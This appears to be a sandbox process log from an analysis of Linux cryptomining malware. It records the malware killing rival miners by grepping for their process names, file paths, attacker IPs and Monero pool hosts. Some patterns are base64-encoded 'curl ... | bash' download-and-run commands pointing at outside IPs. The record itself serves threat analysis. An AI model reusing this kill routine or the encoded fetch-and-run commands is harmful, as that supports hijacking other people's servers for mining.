- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2085
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2094
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2093
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  PID:2092
- /bin/grep
  grep -v grep
  2⤵
  PID:2091
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2090
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2099
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2098
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2097
- /bin/grep
  grep -v grep
  2⤵
  PID:2096
- /bin/ps
  ps aux
  2⤵
  PID:2095
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2104
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2103
- /bin/grep
  grep gitee.com
  2⤵
  PID:2102
- /bin/grep
  grep -v grep
  2⤵
  PID:2101
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2100
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2109
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2108
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2107
- /bin/grep
  grep -v grep
  2⤵
  PID:2106
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2105
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2114
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2113
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:2112
- /bin/grep
  grep -v grep
  2⤵
  PID:2111
- /bin/ps
  ps aux
  2⤵
  PID:2110
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2119
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2118
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:2117
- /bin/grep
  grep -v grep
  2⤵
  PID:2116
- /bin/ps
  ps aux
  2⤵
  PID:2115
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2124
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2123
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:2122
- /bin/grep
  grep -v grep
  2⤵
  PID:2121
- /bin/ps
  ps aux
  2⤵
  PID:2120
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2129
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2128
- /bin/grep
  grep kthrotlds
  2⤵
  PID:2127
- /bin/grep
  grep -v grep
  2⤵
  PID:2126
- /bin/ps
  ps aux
  2⤵
  PID:2125
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2134
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2133
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:2132
- /bin/grep
  grep -v grep
  2⤵
  PID:2131
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2130
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2139
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2138
- /bin/grep
  grep netdns
  2⤵
  PID:2137
- /bin/grep
  grep -v grep
  2⤵
  PID:2136
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2135
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2144
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2143
- /bin/grep
  grep watchdogs
  2⤵
  PID:2142
- /bin/grep
  grep -v grep
  2⤵
  PID:2141
- /bin/ps
  ps aux
  2⤵
  PID:2140
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2149
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2148
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:2147
- /bin/grep
  grep -v grep
  2⤵
  PID:2146
- /bin/ps
  ps aux
  2⤵
  PID:2145
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2154
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2153
- /bin/grep
  grep kinsing
  2⤵
  PID:2152
- /bin/grep
  grep -v grep
  2⤵
  PID:2151
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2150
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2159
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2158
- /bin/grep
  grep redis2
  2⤵
  PID:2157
- /bin/grep
  grep -v grep
  2⤵
  PID:2156
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2155
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2165
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2164
- /bin/grep
  grep " ps"
  2⤵
  PID:2163
- /bin/grep
  grep -v aux
  2⤵
  PID:2162
- /bin/grep
  grep -v grep
  2⤵
  PID:2161
- /bin/ps
  ps aux
  2⤵
  PID:2160
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2170
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2169
- /bin/grep
  grep sync_supers
  2⤵
  PID:2168
- /bin/grep
  grep -v grep
  2⤵
  PID:2167
- /bin/ps
  ps aux
  2⤵
  PID:2166
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2175
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2174
- /bin/grep
  grep cpuset
  2⤵
  PID:2173
- /bin/grep
  grep -v grep
  2⤵
  PID:2172
- /bin/ps
  ps aux
  2⤵
  PID:2171
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2181
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2180
- /bin/grep
  grep "x]"
  2⤵
  PID:2179
- /bin/grep
  grep -v aux
  2⤵
  PID:2178
- /bin/grep
  grep -v grep
  2⤵
  PID:2177
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2176
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2187
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2186
- /bin/grep
  grep "sh] <"
  2⤵
  PID:2185
- /bin/grep
  grep -v aux
  2⤵
  PID:2184
- /bin/grep
  grep -v grep
  2⤵
  PID:2183
- /bin/ps
  ps aux
  2⤵
  PID:2182
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2193
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2192
- /bin/grep
  grep " \\[]"
  2⤵
  PID:2191
- /bin/grep
  grep -v aux
  2⤵
  PID:2190
- /bin/grep
  grep -v grep
  2⤵
  PID:2189
- /bin/ps
  ps aux
  2⤵
  PID:2188
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2198
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2197
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:2196
- /bin/grep
  grep -v grep
  2⤵
  PID:2195
- /bin/ps
  ps aux
  2⤵
  PID:2194
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2203
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2202
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:2201
- /bin/grep
  grep -v grep
  2⤵
  PID:2200
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2199
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2208
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2207
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2206
- /bin/grep
  grep -v grep
  2⤵
  PID:2205
- /bin/ps
  ps aux
  2⤵
  PID:2204
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2213
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2212
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:2211
- /bin/grep
  grep -v grep
  2⤵
  PID:2210
- /bin/ps
  ps aux
  2⤵
  PID:2209
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2218
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2217
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:2216
- /bin/grep
  grep -v grep
  2⤵
  PID:2215
- /bin/ps
  ps aux
  2⤵
  PID:2214
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2223
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2222
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:2221
- /bin/grep
  grep -v grep
  2⤵
  PID:2220
- /bin/ps
  ps aux
  2⤵
  PID:2219
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2228
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2227
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:2226
- /bin/grep
  grep -v grep
  2⤵
  PID:2225
- /bin/ps
  ps aux
  2⤵
  PID:2224
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2233
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2232
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:2231
- /bin/grep
  grep -v grep
  2⤵
  PID:2230
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2229
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2238
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2237
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:2236
- /bin/grep
  grep -v grep
  2⤵
  PID:2235
- /bin/ps
  ps aux
  2⤵
  PID:2234
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2243
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2242
- /bin/grep
  grep sustse
  2⤵
  PID:2241
- /bin/grep
  grep -v grep
  2⤵
  PID:2240
- /bin/ps
  ps aux
  2⤵
  PID:2239
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2248
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2247
- /bin/grep
  grep sustse3
  2⤵
  PID:2246
- /bin/grep
  grep -v grep
  2⤵
  PID:2245
- /bin/ps
  ps aux
  2⤵
  PID:2244
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2254
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2253
- /bin/grep
  grep wget
  2⤵
  PID:2252
- /bin/grep
  grep mr.sh
  2⤵
  PID:2251
- /bin/grep
  grep -v grep
  2⤵
  PID:2250
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2249
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2260
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2259
- /bin/grep
  grep curl
  2⤵
  PID:2258
- /bin/grep
  grep mr.sh
  2⤵
  PID:2257
- /bin/grep
  grep -v grep
  2⤵
  PID:2256
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2255
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2266
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2265
- /bin/grep
  grep wget
  2⤵
  PID:2264
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2263
- /bin/grep
  grep -v grep
  2⤵
  PID:2262
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2261
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2272
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2271
- /bin/grep
  grep curl
  2⤵
  PID:2270
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2269
- /bin/grep
  grep -v grep
  2⤵
  PID:2268
- /bin/ps
  ps aux
  2⤵
  PID:2267
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2278
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2277
- /bin/grep
  grep wget
  2⤵
  PID:2276
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2275
- /bin/grep
  grep -v grep
  2⤵
  PID:2274
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2273
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2284
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2283
- /bin/grep
  grep curl
  2⤵
  PID:2282
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2281
- /bin/grep
  grep -v grep
  2⤵
  PID:2280
- /bin/ps
  ps aux
  2⤵
  PID:2279
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2290
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2289
- /bin/grep
  grep wget
  2⤵
  PID:2288
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2287
- /bin/grep
  grep -v grep
  2⤵
  PID:2286
- /bin/ps
  ps aux
  2⤵
  PID:2285
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2296
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2295
- /bin/grep
  grep curl
  2⤵
  PID:2294
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2293
- /bin/grep
  grep -v grep
  2⤵
  PID:2292
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2291
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2301
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2300
- /bin/grep
  grep j2.conf
  2⤵
  PID:2299
- /bin/grep
  grep -v grep
  2⤵
  PID:2298
- /bin/ps
  ps aux
  2⤵
  PID:2297
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2307
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2306
- /bin/grep
  grep wget
  2⤵
  PID:2305
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2304
- /bin/grep
  grep -v grep
  2⤵
  PID:2303
- /bin/ps
  ps aux
  2⤵
  PID:2302
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2313
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2312
- /bin/grep
  grep curl
  2⤵
  PID:2311
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2310
- /bin/grep
  grep -v grep
  2⤵
  PID:2309
- /bin/ps
  ps aux
  2⤵
  PID:2308
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2319
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2318
- /bin/grep
  grep wget
  2⤵
  PID:2317
- /bin/grep
  grep ficov
  2⤵
  PID:2316
- /bin/grep
  grep -v grep
  2⤵
  PID:2315
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2314
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2325
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2324
- /bin/grep
  grep curl
  2⤵
  PID:2323
- /bin/grep
  grep ficov
  2⤵
  PID:2322
- /bin/grep
  grep -v grep
  2⤵
  PID:2321
- /bin/ps
  ps aux
  2⤵
  PID:2320
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2331
- /bin/grep
  grep wget
  2⤵
  PID:2329
- /bin/grep
  grep he.sh
  2⤵
  PID:2328
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2330
- /bin/grep
  grep -v grep
  2⤵
  PID:2327
- /bin/ps
  ps aux
  2⤵
  PID:2326
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2337
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2336
- /bin/grep
  grep curl
  2⤵
  PID:2335
- /bin/grep
  grep he.sh
  2⤵
  PID:2334
- /bin/grep
  grep -v grep
  2⤵
  PID:2333
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2332
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2343
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2342
- /bin/grep
  grep wget
  2⤵
  PID:2341
- /bin/grep
  grep miner.sh
  2⤵
  PID:2340
- /bin/grep
  grep -v grep
  2⤵
  PID:2339
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2338
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2349
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2348
- /bin/grep
  grep curl
  2⤵
  PID:2347
- /bin/grep
  grep miner.sh
  2⤵
  PID:2346
- /bin/grep
  grep -v grep
  2⤵
  PID:2345
- /bin/ps
  ps aux
  2⤵
  PID:2344
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2355
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2354
- /bin/grep
  grep wget
  2⤵
  PID:2353
- /bin/grep
  grep nullcrew
  2⤵
  PID:2352
- /bin/grep
  grep -v grep
  2⤵
  PID:2351
- /bin/ps
  ps aux
  2⤵
  PID:2350
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2361
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2360
- /bin/grep
  grep curl
  2⤵
  PID:2359
- /bin/grep
  grep nullcrew
  2⤵
  PID:2358
- /bin/grep
  grep -v grep
  2⤵
  PID:2357
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2356
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2366
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2365
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:2364
- /bin/grep
  grep -v grep
  2⤵
  PID:2363
- /bin/ps
  ps aux
  2⤵
  PID:2362
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2371
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2370
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:2369
- /bin/grep
  grep -v grep
  2⤵
  PID:2368
- /bin/ps
  ps aux
  2⤵
  PID:2367
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2376
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2375
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:2374
- /bin/grep
  grep -v grep
  2⤵
  PID:2373
- /bin/ps
  ps aux
  2⤵
  PID:2372
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2381
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2380
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:2379
- /bin/grep
  grep -v grep
  2⤵
  PID:2378
- /bin/ps
  ps aux
  2⤵
  PID:2377
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2386
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2385
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:2384
- /bin/grep
  grep -v grep
  2⤵
  PID:2383
- /bin/ps
  ps aux
  2⤵
  PID:2382
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2391
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2390
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2389
- /bin/grep
  grep -v grep
  2⤵
  PID:2388
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2387
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2396
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2395
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:2394
- /bin/grep
  grep -v grep
  2⤵
  PID:2393
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2392
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2401
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2400
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:2399
- /bin/grep
  grep -v grep
  2⤵
  PID:2398
- /bin/ps
  ps auxf
  2⤵
  PID:2397
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2406
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2405
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  PID:2404
- /bin/grep
  grep -v grep
  2⤵
  PID:2403
- /bin/ps
  ps auxf
  2⤵
  PID:2402
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2411
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2410
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:2409
- /bin/grep
  grep -v grep
  2⤵
  PID:2408
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2407
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2416
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2415
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:2414
- /bin/grep
  grep -v grep
  2⤵
  PID:2413
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2412
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2421
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2420
- /bin/grep
  grep monerohash.com
  2⤵
  PID:2419
- /bin/grep
  grep -v grep
  2⤵
  PID:2418
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2417
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2426
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2425
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  PID:2424
- /bin/grep
  grep -v grep
  2⤵
  PID:2423
- /bin/ps
  ps auxf
  2⤵
  PID:2422
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2431
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2430
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:2429
- /bin/grep
  grep -v grep
  2⤵
  PID:2428
- /bin/ps
  ps auxf
  2⤵
  PID:2427
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2436
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2435
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:2434
- /bin/grep
  grep -v grep
  2⤵
  PID:2433
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2432
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2441
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2440
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:2439
- /bin/grep
  grep -v grep
  2⤵
  PID:2438
- /bin/ps
  ps auxf
  2⤵
  PID:2437
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2446
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2445
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:2444
- /bin/grep
  grep -v grep
  2⤵
  PID:2443
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2442
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2451
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2450
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:2449
- /bin/grep
  grep -v grep
  2⤵
  PID:2448
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2447
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2456
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2455
- /bin/grep
  grep kieuanilam.me
  2⤵
  PID:2454
- /bin/grep
  grep -v grep
  2⤵
  PID:2453
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2452
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2460
- - /usr/local/sbin/kill
    kill -9 2458
    3⤵
    PID:2461
- - /usr/local/bin/kill
    kill -9 2458
    3⤵
    PID:2461
- - /usr/sbin/kill
    kill -9 2458
    3⤵
    PID:2461
- - /usr/bin/kill
    kill -9 2458
    3⤵
    PID:2461
- - /sbin/kill
    kill -9 2458
    3⤵
    PID:2461
- - /bin/kill
    kill -9 2458
    3⤵
    PID:2461
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2459
- /bin/grep
  grep xiaoyao
  2⤵
  PID:2458
- /bin/ps
  ps auxf
  2⤵
  PID:2457
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2465
- - /usr/local/sbin/kill
    kill -9 2463
    3⤵
    PID:2466
- - /usr/local/bin/kill
    kill -9 2463
    3⤵
    PID:2466
- - /usr/sbin/kill
    kill -9 2463
    3⤵
    PID:2466
- - /usr/bin/kill
    kill -9 2463
    3⤵
    PID:2466
- - /sbin/kill
    kill -9 2463
    3⤵
    PID:2466
- - /bin/kill
    kill -9 2463
    3⤵
    PID:2466
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2464
- /bin/grep
  grep xiaoxue
  2⤵
  PID:2463
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2462
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2472
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2471
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2470
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2469
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:2468
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2478
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2477
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2476
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2475
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2474
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2480
- /usr/bin/pgrep
  pgrep -f monerohash
  2⤵
  PID:2479
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2482
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  PID:2481
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2484
- /usr/bin/pgrep
  pgrep -f xzpauectgr
  2⤵
  - Reads CPU attributes
  PID:2483
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2486
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2485
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2488
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  PID:2487
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2490
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  PID:2489
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2492
- /usr/bin/pgrep
  pgrep -f 200.68.17.196
  2⤵
  PID:2491
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2494
- /usr/bin/pgrep
  pgrep -f IyEvYmluL3NoCgpzUG
  2⤵
  PID:2493
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2496
- /usr/bin/pgrep
  pgrep -f KHdnZXQgLXFPLSBodHRw
  2⤵
  - Reads CPU attributes
  PID:2495
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2498
- /usr/bin/pgrep
  pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
  2⤵
  PID:2497
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
